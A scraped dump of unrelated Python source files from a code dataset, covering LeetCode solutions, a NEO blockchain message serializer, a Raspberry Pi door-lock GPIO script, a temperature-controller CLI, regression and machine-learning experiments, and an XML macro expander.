#\n # i (slow) starts with 1st element, j starts with 2nd element.\n # if A[i] and A[j] is different, increment i, and copy j to i.\n #\n # in essence, j is the frontier, whenever we encounter an element\n # that is different from our tail in smaller set, we add it to the\n # tail of our smaller set.\n #\n # since array is sorted, this will automatically ignore any\n # duplicates when A[i] == A[j]\n\n def removeDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n return self.remove_dup2(nums)\n\n # simpler loop, from solution.\n # 161 / 161 test cases passed.\n # Status: Accepted\n # Runtime: 104 ms (beats 22.04% of py3)\n def remove_dup2(self, A):\n\n n = len(A)\n if n < 2:\n return n\n\n i = 0\n for j in range(1, n):\n if A[i] != A[j]:\n i += 1\n A[i] = A[j]\n\n return i+1\n\n # my version\n # use 2 pointers. i, left side, target, and j, right side, source.\n # advance j until next char is different (so j points to last\n # occurrence of current char), then copy j to i. increment both i &\n # j and repeat.\n def remove_dup(self, A):\n n = len(A)\n i = 0\n j = 0\n while j < n:\n A[i] = A[j] # copy j to i\n while j+1 < n and A[j] == A[j + 1]: # advance j while same\n j += 1\n i += 1\n j += 1\n return i\n\n\nclass TestRemoveDup(unittest.TestCase):\n\n def setUp(self):\n self.sol = Solution()\n\n def test1(self):\n A = [1, 2, 3, 4]\n v = self.sol.removeDuplicates(A)\n self.assertEqual(A[:v], [1, 2, 3, 4])\n\n def test2(self):\n A = [1, 2, 2, 2, 3, 4, 4, 4]\n v = self.sol.removeDuplicates(A)\n self.assertEqual(A[:v], [1, 2, 3, 4])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"leetcode/1-easy/1-array/1-removedup/remove_dup.py","file_name":"remove_dup.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"654487453","text":"from neo.IO.Mixins import SerializableMixin\nfrom neo.IO.BinaryReader import BinaryReader\nfrom neo.IO.BinaryWriter import BinaryWriter\nfrom neo.IO.MemoryStream import MemoryStream\nfrom neo import Settings\nfrom neo.Core.Helper import Helper\nfrom neo.Cryptography.Helper import *\nimport ctypes\nimport asyncio\nimport binascii\nfrom autologging import logged\n\n@logged\nclass Message(SerializableMixin):\n\n\n PayloadMaxSize = b'\\x02000000'\n PayloadMaxSizeInt = int.from_bytes(PayloadMaxSize, 'big')\n\n Magic = None\n\n Command = None\n\n Checksum = None\n\n Payload = None\n\n\n def __init__(self, command=None, payload = None):\n\n self.Command = command\n self.Magic = Settings.MAGIC\n\n if payload is None:\n payload = bytearray()\n else:\n payload = binascii.unhexlify( Helper.ToArray(payload))\n\n self.Checksum = Message.GetChecksum(payload)\n self.Payload = payload\n\n def Size(self):\n return ctypes.sizeof(ctypes.c_uint) + 12 + ctypes.sizeof(ctypes.c_int) + ctypes.sizeof(ctypes.c_uint) + len(self.Payload)\n\n def Deserialize(self, reader):\n if reader.ReadUInt32() != self.Magic:\n raise Exception(\"Invalid format, wrong magic\")\n\n self.Command = reader.ReadFixedString(12).decode('utf-8')\n\n length = reader.ReadUInt32()\n\n if length > self.PayloadMaxSizeInt:\n raise Exception(\"invalid format- payload too large\")\n\n self.Checksum = reader.ReadUInt32()\n\n self.Payload = reader.ReadBytes(length)\n\n\n if not Message.GetChecksum(self.Payload) == self.Checksum:\n raise Exception(\"checksum mismatch\")\n\n self.__log.debug(\"Deserialized Message %s \" % self.Command)\n\n @staticmethod\n def DeserializeFromAsyncStream(stream, cancellation_token):\n\n buffer = bytearray(24)\n\n raise NotImplementedError()\n\n\n @staticmethod\n def DeserializeFromAsyncSocket(socket, cancellation_token):\n buffer = bytearray(24)\n\n try:\n socket.recv_into(buffer, 24)\n\n ms = MemoryStream(buffer)\n reader = BinaryReader(ms)\n\n message = Message()\n\n message.Magic = reader.ReadUInt32()\n message.Command = reader.ReadFixedString(12).decode('utf-8')\n\n length = reader.ReadUInt32()\n\n if length > Message.PayloadMaxSizeInt:\n raise Exception(\"format too big\")\n\n message.Checksum = reader.ReadUInt32()\n\n message.Payload = bytearray(length)\n\n if length > 0:\n message.Payload = Message.FillBufferAsyncStream(socket, length, None)\n\n checksum = Message.GetChecksum(message.Payload)\n\n if checksum != message.Checksum:\n\n print(\"Message command :%s \" % message.Command)\n print(\"Checksum mismatch: %s \" % message.Checksum)\n print(\"message payload: %s \" % message.Payload)\n\n raise Exception(\"invalid checksum\")\n\n return message\n\n except Exception as e:\n print(\"could not receive buffer from socket: %s \" % e)\n\n\n\n\n\n @staticmethod\n def FillBufferAsyncStream(stream, length, cancellation_token):\n chunks=[]\n bytes_received=0\n\n while bytes_received < length:\n chunk = stream.recv(min(length - bytes_received, 1024))\n if chunk == b'':\n raise Exception('Socket connection broken')\n chunks.append(chunk)\n bytes_received = bytes_received + len(chunk)\n\n return b''.join(chunks)\n\n @staticmethod\n async def FillBufferAsyncSocket(socket, buffer, cancellation_token):\n raise NotImplementedError()\n\n\n\n @staticmethod\n def GetChecksum(value):\n\n uint32 = bin_dbl_sha256(value)[:4]\n\n return int.from_bytes( uint32, 'little')\n\n\n\n def Serialize(self, writer):\n\n writer.WriteUInt32(self.Magic)\n writer.WriteFixedString(self.Command, 12)\n writer.WriteUInt32(len(self.Payload))\n writer.WriteUInt32(self.Checksum)\n writer.WriteBytes(self.Payload)\n\n","sub_path":"neo/Network/Message.py","file_name":"Message.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623290633","text":"# 올바른 괄호\n# 문제 설명\n# 괄호가 바르게 짝지어졌다는 것은 '(' 문자로 열렸으면 반드시 짝지어서 ')' 문자로 닫혀야 한다는 뜻입니다. 예를 들어\n\n# ()() 또는 (())() 는 올바른 괄호입니다.\n# )()( 또는 (()( 는 올바르지 않은 괄호입니다.\n# '(' 또는 ')' 로만 이루어진 문자열 s가 주어졌을 때, 문자열 s가 올바른 괄호이면 true를 return 하고, \n# 올바르지 않은 괄호이면 false를 return 하는 solution 함수를 완성해 주세요.\n\ndef solution(s):\n answer = True\n stack = []\n for i in s:\n if i is \"(\":\n stack.append(i)\n elif i is \")\":\n if len(stack) is 0 or stack[-1] is \")\":\n answer = False\n break\n else:\n stack.pop()\n if len(stack) is not 0:\n answer = False\n return answer\n\n# def is_pair(s):\n# st = list()\n# for c in s:\n# if c == '(':\n# st.append(c)\n\n# if c == ')':\n# try:\n# st.pop()\n# except IndexError:\n# return False\n\n# return len(st) == 0\n","sub_path":"programmers/level_2/right_bracket.py","file_name":"right_bracket.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"183823523","text":"#LEGACY CODE ONLY FOR FUTURE REFERENCE\n\nimport RPi.GPIO as GPIO\nimport time\nfrom sys import argv\n\nGPIO.setmode(GPIO.BCM)\nlockPin = 18;\n\ndef unlock():\n GPIO.setup(lockPin,GPIO.OUT)\n GPIO.output(lockPin, True);\n time.sleep(0.3)\n GPIO.output(lockPin, False);\n GPIO.cleanup([lockPin]);\n\nif len(argv) > 1:\n unlock();\n","sub_path":"Server/Legacy/lock.py","file_name":"lock.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"79089178","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/jamesjeffryes/Documents/NuMat/watlow/build/lib/watlow/__init__.py\n# Compiled at: 2020-02-20 16:03:43\n# Size of source mod 2**32: 1439 bytes\n\"\"\"Python driver for Watlow EZ-Zone temperature controllers.\n\nDistributed under the GNU General Public License v2\nCopyright (C) 2019 NuMat Technologies\n\"\"\"\nfrom watlow.driver import TemperatureController, Gateway\nfrom watlow import mock\n\ndef command_line():\n \"\"\"CLI interface, accessible when installed through pip.\"\"\"\n import argparse, json\n parser = argparse.ArgumentParser(description='Control a Watlow temperature controller or gateway from the command line.')\n parser.add_argument('port', nargs='?', default='/dev/ttyUSB0', help=\"The target serial port or TCP address. Default '/dev/ttyUSB0'.\")\n parser.add_argument('--set-setpoint', '-f', default=None, type=float, help='Sets the setpoint temperature.')\n parser.add_argument('--zone', '-z', default=None, type=int, help='Specify zone in case of gateway')\n args = parser.parse_args()\n if args.zone:\n gateway = Gateway(args.port)\n temperature_controller = TemperatureController(port=(args.port))\n try:\n if args.set_setpoint:\n temperature_controller.set(args.set_setpoint)\n state = temperature_controller.get()\n print(json.dumps(state, indent=2, sort_keys=True))\n finally:\n temperature_controller.close()\n\n\nif __name__ == '__main__':\n command_line()","sub_path":"pycfiles/watlow-0.2.1-py2.py3-none-any/__init__.cpython-37.py","file_name":"__init__.cpython-37.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"443806478","text":"# import sys\n# import os\n# import numpy as np\nimport regression\nimport ipdb\n#ipdb.set_trace()\n\nn = 100\nw1 = 2\nw0 = 1\ne = 0.8\nfilename = 'regression-'+str(n)+'-'+str(w1)+'-'+str(w0)+'-'+str(e)\nx, y = regression.generate_data(n, w1, w0, e, filename+'.txt')\n# x,y = regression.read_data(filename+'.txt')\nregression.plot_data_with_line(x, y, w1, w0, filename+'.png')\npoints = 100\noffset = 50\nscale = 0.1\nnpower = 2\nsteps = 20\nrate = .675\nrate_decay = .99\n#ipdb.set_trace()\n(landscape, minw1, minw0, mindev) = \\\n regression.generate_landscape(x, y,\n points, offset, scale, npower)\nregression.plot_landscape(landscape, minw1, minw0, mindev, w1, w0, points, offset, scale, -1, [], [], filename+'-L'+str(npower)+'.png')\n(w1_gd,w0_gd)=regression.gradient_descent(x,y,landscape,points,offset,scale,-4.9,0.5,rate,rate_decay,steps)\nfor i in range(0,steps+1,5):\n\tregression.plot_landscape(landscape,minw1,minw0,mindev,w1,w0,points,offset,scale,i,w1_gd,w0_gd,filename+'-landscape-L'+str(npower)+'-decay'+str(rate_decay)+'-rate'+str(rate)+'-'+str(i)+'.png')\n\tregression.plot_data_with_line(x,y,w1_gd[i],w0_gd[i],filename+'-L'+str(npower)+'-decay'+str(rate_decay)+'-rate'+str(rate)+'-'+str(i)+'.png')\n","sub_path":"regression_main.py","file_name":"regression_main.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"652809851","text":"\"\"\"\nWrite a function called stop_at_four that iterates through a list of \nnumbers. Using a while loop, append each number to a new list until \nthe number 4 appears. The function should return the new list.\n\"\"\"\n\ndef stop_at_four(my_list):\n \"\"\"function to stop at a specific value\"\"\"\n \n new_list = []\n count = 0\n \n while (count < len(my_list)) and (my_list[count] != 4):\n new_list.append(my_list[count])\n count +=1\n \n return new_list\n\nprint(stop_at_four([1,2,3,5,6,4]))\n\n","sub_path":"week4/exe3.py","file_name":"exe3.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"44572907","text":"words = ['sadfsd','asdgasdf','asdfsdf',\\\n 'asdfasdf','grt', 'sdfgsdfhshrt']\nlis = []\n\nwords.sort(key = lambda x : len(x), reverse = True)\nprint(words)\n# for word in words:\n# lis.append((len(word),word))\n# lis.sort(reverse = True)\n# res = []\n#\n# for length, word in lis:\n# res.append(word)\n#\n# print(res)\n","sub_path":"basc/tuple_DSU.py","file_name":"tuple_DSU.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"104989046","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/compactxml/expand.py\n# Compiled at: 2010-10-25 17:17:52\nfrom __future__ import absolute_import\nimport re, copy\nfrom lxml import etree\nimport pyparsing\nfrom .namespace import Namespaces, UndefinedPrefix\nfrom .variable import Variables\nfrom .macro import Macros\nfrom .expression import Expression, NamedExpression\nfrom .error import ExpandError\nfrom .grammar import create_grammar\nfrom .parser import Parser\n\nclass NamespaceLookahead(Parser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros):\n self.aNamespaces = copy.copy(aNamespaces)\n Parser.parse(self, scope, self.aNamespaces, aVariables, aMacros)\n return self.aNamespaces\n\n def attribute(self, statement, aNamespaces, aVariables, aMacros):\n try:\n name, value = self.parse_attribute(statement, aNamespaces, aVariables, aMacros)\n except UndefinedPrefix:\n pass\n\n if aNamespaces.is_namespace_name(name):\n if value is None:\n value = aVariables.default\n self.aNamespaces[None] = value\n elif aNamespaces.is_namespace_prefix(name):\n if value is None:\n value = aVariables.default\n self.aNamespaces[name.localname] = value\n return\n\n def namespace(self, statement, aNamespaces, aVariables, aMacros):\n prefix, value = self.parse_namespace(statement, aNamespaces, aVariables, aMacros)\n self.aNamespaces[prefix] = value\n\n\nclass AttributeLookahead(Parser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros):\n self.aAttributes = {}\n Parser.parse(self, scope, aNamespaces, aVariables, aMacros)\n return self.aAttributes\n\n def attribute(self, statement, aNamespaces, aVariables, aMacros):\n name, value = self.parse_attribute(statement, aNamespaces, aVariables, aMacros)\n if value is None:\n value = aVariables.default\n if not (aNamespaces.is_namespace_name(name) or aNamespaces.is_namespace_prefix(name)):\n self.aAttributes[name] = value\n return\n\n\nclass DefinitionLookahead(Parser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros):\n self.aParameters = []\n self.aElements = []\n Parser.parse(self, scope, aNamespaces, aVariables, aMacros)\n return (\n self.aParameters, self.aElements)\n\n def attribute(self, statement, aNamespaces, aVariables, aMacros):\n name, value = self.parse_attribute(statement, aNamespaces, aVariables, aMacros)\n self.aParameters.append((name, value))\n\n def default(self, statement, aNamespaces, aVariables, aMacros):\n self.aElements.append(statement)\n\n\nclass ExpansionLookahead(Parser):\n\n class UndefinedPositionalParameter(IndexError):\n\n def __init__(self, cPositional):\n self.cPositional = cPositional\n IndexError.__init__(self, str(self))\n\n def __str__(self):\n return 'More positional parameters given than the %d defined.' % self.cPositional\n\n def parse(self, scope, aNamespaces, aVariables, aMacros, aParameters, expansionSource):\n self.aParametersLookup = dict((name, value) for name, value in aParameters)\n self.aPositional = []\n self.aNamed = {}\n self.aContents = []\n Parser.parse(self, scope, aNamespaces, aVariables, aMacros)\n aPositionalNames = [ name for name, value in aParameters if name not in self.aNamed ]\n cPositional = len(aPositionalNames)\n for ePositional in self.aPositional:\n try:\n name = aPositionalNames.pop(0)\n except IndexError:\n raise self.UndefinedPositionalParameter(cPositional)\n\n self.aNamed[name] = ePositional\n\n for name in aPositionalNames:\n value = self.aParametersLookup[name]\n if value is not None:\n self.aNamed[name] = value\n\n aVariables = aVariables.new_scope(self.aNamed, expansionSource)\n aVariables.contents = self.aContents\n return aVariables\n\n def attribute(self, statement, aNamespaces, aVariables, aMacros):\n expression = NamedExpression(statement[2:], aNamespaces, aVariables)\n name = expression.name()\n value = expression.value()\n if name in self.aParametersLookup:\n if value is None:\n value = self.aParametersLookup[name]\n if value is None:\n value = aVariables.default\n self.aNamed[name] = value\n else:\n self.aContents.append(statement)\n return\n\n def positional(self, statement, aNamespaces, aVariables, aMacros):\n value = Expression(statement[2], aNamespaces, aVariables).value()\n self.aPositional.append(value)\n\n def default(self, statement, aNamespaces, aVariables, aMacros):\n self.aContents.append(statement)\n\n\nclass BodyParser(Parser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros, tree):\n self.aCreated = []\n Parser.parse(self, scope, aNamespaces, aVariables, aMacros, tree)\n return self.aCreated\n\n def element(self, statement, aNamespaces, aVariables, aMacros, tree):\n aElementNamespaces = NamespaceLookahead().parse(statement[3:], aNamespaces, aVariables, aMacros)\n aAttributes = AttributeLookahead().parse(statement[3:], aElementNamespaces, aVariables, aMacros)\n name = Expression(statement[2], aElementNamespaces, aVariables).qname()\n tree.start(name, aAttributes, nsmap=aElementNamespaces.nsmap())\n BodyParser().parse(statement[3:], aElementNamespaces, aVariables, aMacros, tree)\n self.aCreated.append(tree.end(name))\n\n def element_expansion(self, statement, aNamespaces, aVariables, aMacros, tree):\n name = Expression(statement[2], aNamespaces, aVariables).name()\n aDefinedParameters, aElements, expansionSource = aMacros.element(name)\n try:\n aExpansionVariables = ExpansionLookahead().parse(statement[3:], aNamespaces, aVariables, aMacros, aDefinedParameters, expansionSource)\n aCreatedInNestedScope = BodyParser().parse(aElements, aNamespaces, aExpansionVariables, aMacros, tree)\n except ExpansionLookahead.UndefinedPositionalParameter as exception:\n raise ExpandError(unicode(exception), exception)\n except ExpandError as exception:\n exception.bind_name(name)\n exception.bind_source(expansionSource)\n raise\n\n self.aCreated.extend(aCreatedInNestedScope)\n\n def text(self, statement, aNamespaces, aVariables, aMacros, tree):\n value = Expression(statement[2], aNamespaces, aVariables).value()\n tree.data(value)\n\n def comment(self, statement, aNamespaces, aVariables, aMacros, tree):\n value = Expression(statement[2], aNamespaces, aVariables).value()\n self.aCreated.append(tree.comment(value))\n\n def processing_instruction(self, statement, aNamespaces, aVariables, aMacros, tree):\n namedExpression = NamedExpression(statement[2:], aNamespaces, aVariables)\n name = namedExpression.prefix()\n value = namedExpression.value()\n self.aCreated.append(tree.pi(name, value))\n\n def attribute_default(self, statement, aNamespaces, aVariables, aMacros, tree):\n default = Expression(statement[3], aNamespaces, aVariables).value()\n aVariables.default = default\n\n def variable(self, statement, aNamespaces, aVariables, aMacros, tree):\n variableExpression = NamedExpression(statement[3:], aNamespaces, aVariables)\n name = variableExpression.name()\n value = variableExpression.value()\n if value is None:\n value = ''\n aVariables.set_global(name, value)\n return\n\n\nclass TopParser(BodyParser):\n\n def parse(self, scope, aNamespaces, aVariables, aMacros, tree):\n self.documentType = None\n aCreated = BodyParser.parse(self, scope, aNamespaces, aVariables, aMacros, tree)\n return (\n self.documentType, aCreated)\n\n def doctype(self, statement, aNamespaces, aVariables, aMacros, tree):\n self.documentType = Expression(statement[3], aNamespaces, aVariables).value()\n\n def load(self, statement, aNamespaces, aVariables, aMacros, tree):\n location = Expression(statement[3], aNamespaces, aVariables).value()\n from . import resolve\n resolved = resolve(location)\n assert isinstance(resolved, basestring)\n aNewMacros = load_macros(resolved, aNamespaces.nsmap(), aVariables.aGlobals, aMacros)\n aMacros.update(aNewMacros)\n\n def encoding(self, statement, aNamespaces, aVariables, aMacros, tree):\n encoding = Expression(statement[3], aNamespaces, aVariables).value()\n aVariables.encoding = encoding\n\n def attribute_definition(self, statement, aNamespaces, aVariables, aMacros, tree):\n name = Expression(statement[3], aNamespaces, aVariables).name()\n aMacros.add_attribute(name, statement[4:], aVariables.source)\n\n def element_definition(self, statement, aNamespaces, aVariables, aMacros, tree):\n name = Expression(statement[3], aNamespaces, aVariables).name()\n aParameters, aElements = DefinitionLookahead().parse(statement[4:], aNamespaces, aVariables, aMacros)\n aMacros.add_element(name, aParameters, aElements, aVariables.source)\n\n def default(self, statement, aNamespaces, aVariables, aMacros, tree):\n raise NotImplementedError(statement)\n\n\nclass LoadParser(Parser):\n\n def variable(self, statement, aNamespaces, aVariables, aMacros):\n variableExpression = NamedExpression(statement[3:], aNamespaces, aVariables)\n name = variableExpression.name()\n value = variableExpression.value()\n if value is None:\n value = ''\n aVariables.set_global(name, value)\n return\n\n def attribute_definition(self, statement, aNamespaces, aVariables, aMacros):\n name = Expression(statement[3], aNamespaces, aVariables).name()\n aMacros.add_attribute(name, statement[4:], aVariables.source)\n\n def element_definition(self, statement, aNamespaces, aVariables, aMacros):\n name = Expression(statement[3], aNamespaces, aVariables).name()\n aParameters, aElements = DefinitionLookahead().parse(statement[4:], aNamespaces, aVariables, aMacros)\n aMacros.add_element(name, aParameters, aElements, aVariables.source)\n\n\ndef setup(compacted, namespaces, variables, macros):\n grammar = create_grammar()\n try:\n parsed = grammar.parseString(compacted, True)\n except pyparsing.ParseException as exception:\n error = ExpandError(exception.msg, exception)\n error.bind_location(exception.loc)\n error.bind_source(compacted)\n raise error\n\n aMacros = Macros() if macros is None else copy.copy(macros)\n aVariables = Variables(variables).new_scope({}, compacted)\n aNamespaces = Namespaces(namespaces)\n return (\n parsed, aMacros, aVariables, aNamespaces)\n\n\ndef load_macros(compacted, namespaces={}, variables={}, macros=None):\n parsed, aMacros, aVariables, aNamespaces = setup(compacted, namespaces, variables, macros)\n try:\n LoadParser().parse(parsed, aNamespaces, aVariables, aMacros)\n except ExpandError as exception:\n exception.bind_source(compacted)\n raise\n\n return aMacros\n\n\ndef expand(compacted, namespaces={}, variables={}, macros=None):\n parsed, aMacros, aVariables, aNamespaces = setup(compacted, namespaces, variables, macros)\n tree = etree.TreeBuilder()\n try:\n documentType, aCreated = TopParser().parse(parsed, aNamespaces, aVariables, aMacros, tree)\n except ExpandError as exception:\n exception.bind_source(compacted)\n raise\n\n lastElement = tree.close()\n if len(aCreated) == 1 and not documentType:\n tree = lastElement.getroottree()\n elif not documentType:\n aBefore = []\n rootElement = None\n aAfter = []\n for ePart in aCreated:\n if isinstance(ePart, etree._Comment) or isinstance(ePart, etree._ProcessingInstruction):\n if rootElement is None:\n aBefore.append(ePart)\n else:\n aAfter.append(ePart)\n else:\n assert isinstance(ePart, etree._Element)\n if rootElement is None:\n rootElement = ePart\n else:\n raise ValueError('XML document must have exactly one root element.')\n\n if rootElement is None:\n raise ValueError('XML document must have exactly one root element.')\n while aBefore:\n rootElement.addprevious(aBefore.pop())\n\n aAfter.reverse()\n while aAfter:\n rootElement.addnext(aAfter.pop())\n\n tree = rootElement.getroottree()\n else:\n aCreatedParts = [ etree.tostring(ePart) for ePart in aCreated ]\n if documentType:\n doctypePart = '' % documentType\n aCreatedParts = [doctypePart] + aCreatedParts\n tree = etree.fromstring(('').join(aCreatedParts)).getroottree()\n return (\n aVariables.encoding, tree)","sub_path":"pycfiles/compadre-1.0.34.tar/expand.py","file_name":"expand.py","file_ext":"py","file_size_in_byte":13347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"285956528","text":"import torch\nfrom torchtext import data, vocab\nimport matplotlib.ticker as ticker\nfrom collections import Counter\nimport pickle\nimport os\nimport torch\nimport numpy as np\nfrom fastai.text import *\nimport sys\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport networkx as nx\nfrom nltk.tokenize.punkt import PunktSentenceTokenizer\nfrom sklearn.feature_extraction.text import TfidfTransformer, CountVectorizer\nimport threading\nimport nltk\nfrom nltk.corpus import stopwords\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom fastai.nlp import *\nfrom fastai.model import Stepper\n\nclass AbstractiveRNN(nn.Module):\n\n def __init__(self, input_size, embz_size, hidden_size, batch_size, output_size, max_tgt_len, pre_trained_vector,\n padding_idx, encoder_drop=(0.0, 0.0), decoder_drop=(0.0, 0.0)):\n\n super().__init__()\n\n # initialize model parameters\n self.init_model_params(decoder_drop, embz_size, encoder_drop, hidden_size, input_size, max_tgt_len, output_size,\n padding_idx, pre_trained_vector)\n\n # encoder\n self.init_encoder()\n\n # decoder\n self.init_decoder()\n # set attention\n self.encoder_output_layer = nn.Linear(self.hidden_size * 1, self.embz_size)\n self.init_attn()\n\n def init_model_params(self, decoder_drop, embz_size, encoder_drop, hidden_size, input_size, max_tgt_len,\n output_size, padding_idx, pre_trained_vector):\n self.output_size, self.embz_size, self.hidden_size = output_size, embz_size, hidden_size // 2\n self.input_size, self.max_tgt_len, self.pre_trained_vector = input_size, max_tgt_len, pre_trained_vector\n self.encoder_drop, self.decoder_drop, self.padding_idx = encoder_drop, decoder_drop, padding_idx\n\n def init_attn(self):\n self.att_vector_layer = nn.Linear(self.embz_size + self.embz_size, self.embz_size)\n\n def init_decoder(self):\n self.decoder_dropout = nn.Dropout(self.decoder_drop[0])\n self.decoder_embedding_layer = nn.Embedding(self.input_size, self.embz_size, padding_idx=self.padding_idx)\n self.decoder_rnn = nn.LSTM(\n input_size=self.embz_size,\n hidden_size=self.hidden_size,\n num_layers=1,\n dropout=self.decoder_drop[1])\n self.decoder_output_layer = nn.Linear(self.hidden_size, self.embz_size)\n self.output_layer = nn.Linear(self.embz_size, self.output_size)\n self.decoder_embedding_layer.weight = self.encoder_embedding_layer.weight\n self.output_layer.weight = self.decoder_embedding_layer.weight\n\n def init_encoder(self):\n self.encoder_dropout = nn.Dropout(self.encoder_drop[0])\n self.encoder_embedding_layer = nn.Embedding(self.input_size, self.embz_size, padding_idx=self.padding_idx)\n self.encoder_embedding_layer.weight.data.copy_(self.pre_trained_vector.weight.data)\n self.encoder_rnn = nn.LSTM(\n input_size=self.embz_size,\n hidden_size=self.hidden_size,\n num_layers=1,\n dropout=self.encoder_drop[1])\n self.encoder_vector_layer = nn.Linear(self.hidden_size, self.embz_size)\n\n def init_hidden(self, batch_size):\n return (V(torch.zeros(1, batch_size, self.hidden_size)),\n V(torch.zeros(1, batch_size, self.hidden_size)))\n\n def store_path(self, hidden):\n def _cat(h):\n return torch.cat([h[0:h.size(0):2], h[1:h.size(0):2]], 2)\n\n hidden = tuple([_cat(h) for h in hidden])\n return hidden\n\n def attn(self, encoder_output, decoder_output):\n encoder_output = self.encoder_output_layer(encoder_output)\n encoder_output = encoder_output.transpose(0, 1)\n decoder_output = decoder_output.transpose(0, 1)\n att_score = torch.bmm(encoder_output, decoder_output.transpose(-1, 1))\n att_weight = F.softmax(att_score, dim=1)\n context_vector = torch.bmm(att_weight.transpose(-1, 1), encoder_output).squeeze(1)\n att_vector = torch.cat((context_vector, decoder_output.squeeze(1)), dim=1)\n att_vector = self.att_vector_layer(att_vector)\n att_vector = F.tanh(att_vector)\n return att_weight.squeeze(-1), att_vector\n\n def decoder_forward(self, batch_size, encoder_output, decoder_hidden, y=None):\n decoder_input = V(torch.zeros(batch_size).long())\n output_seq_stack, att_stack = [], []\n output_seq_stack, att_stack = self.process_decoder_forward(att_stack, decoder_hidden, decoder_input,\n encoder_output, output_seq_stack, y)\n\n return torch.stack(output_seq_stack), torch.stack(att_stack)\n\n def process_decoder_forward(self, att_stack, decoder_hidden, decoder_input, encoder_output, output_seq_stack, y):\n for i in range(self.max_tgt_len):\n decoder_input = self.decoder_dropout(self.decoder_embedding_layer(decoder_input))\n decoder_output, decoder_hidden = self.decoder_rnn(decoder_input.unsqueeze(0), decoder_hidden)\n decoder_output = self.decoder_output_layer(decoder_output)\n att, decoder_output = self.attn(encoder_output, decoder_output)\n att_stack.append(att)\n output = self.output_layer(decoder_output)\n output_seq_stack.append(output)\n decoder_input = V(output.data.max(1)[1])\n if (decoder_input == 1).all(): break\n samp_prob = round(random.random(), 1)\n if (y is not None) and (samp_prob < 1):\n if i >= len(y): break\n decoder_input = y[i]\n return output_seq_stack, att_stack\n\n def forward(self, seq, y=None):\n batch_size = seq[0].size(0)\n encoder_hidden = self.init_hidden(batch_size)\n encoder_input = self.encoder_dropout(self.encoder_embedding_layer(seq))\n encoder_output, encoder_hidden = self.encoder_rnn(encoder_input, encoder_hidden)\n encoder_hidden = self.store_path(encoder_hidden)\n output = self.decoder_forward(batch_size, encoder_output, encoder_hidden, y=y)\n encoder_vector = self.encoder_vector_layer(encoder_hidden[0][-1])\n output = output + (encoder_vector,)\n return output\n","sub_path":"Final_Project/absctrative_rnn.py","file_name":"absctrative_rnn.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"389255812","text":"from PythonASTExtension import *\nfrom AssemblyAST import *\nimport copy\n\nclass MemoryAssignment:\n\t\n\tdef __init__(self,coloredGraph):\n\t\tself.memory = {}\n\t\tself.coloredGraph = coloredGraph\n\n\tdef assignMemoryLocationMap(self,ast):\n\t\tif isinstance(ast,AssName) or isinstance(ast,Name):\n\t\t\tif ast.name not in self.memory: self.memory[ast.name] = MemoryOperand(Registers32.EBP,-4*(len(self.memory)+1))\n\t\t\tast.memory = self.memory[ast.name]\n\t\t\treturn ast\n\t\telif isinstance(ast,Function):\n\t\t\tast.memory = copy.deepcopy(self.memory)\n\t\t\tself.memory = {}\n\t\t\treturn ast\n\t\telse: return ast;\n\n","sub_path":"MemoryAssignment.py","file_name":"MemoryAssignment.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"344209100","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.cluster import KMeans\nfrom collections import Counter\nfrom sklearn import metrics\nfrom collections import Counter\n\nclass K_Means:\n def run(self, name, x_train, x_test, y_train, y_test, k=5):\n myset = set(y_train) # Cria um conjunto. Em conjuntos, dados não se repetem. Assim, esse conjunto conterá apenas um valor de cada, ou seja: [1,2,3]\n clusters = len(myset) # Quantos clusters teremos no KMeans\n\n model = KMeans(n_clusters = clusters)\n model = model.fit(x_train)\n\n # Pegar os labels dos padrões de Treinamento\n labels = model.labels_\n\n map_labels = []\n\n for i in range(clusters):\n map_labels.append([])\n\n new_y_train = list(y_train)\n\n for i in range(len(y_train)):\n for c in range(clusters):\n if labels[i] == c:\n map_labels[c].append(new_y_train[i])\n\n # print(map_labels)\n\n # Criar dicionário com os labells a serem mapeados\n mapping = {}\n\n for i in range(clusters):\n final = Counter(map_labels[i]) # contar a classe que mais aparece\n value = final.most_common(1)[0][0] # retorna a classe com maior frequência\n mapping[i] = value\n\n 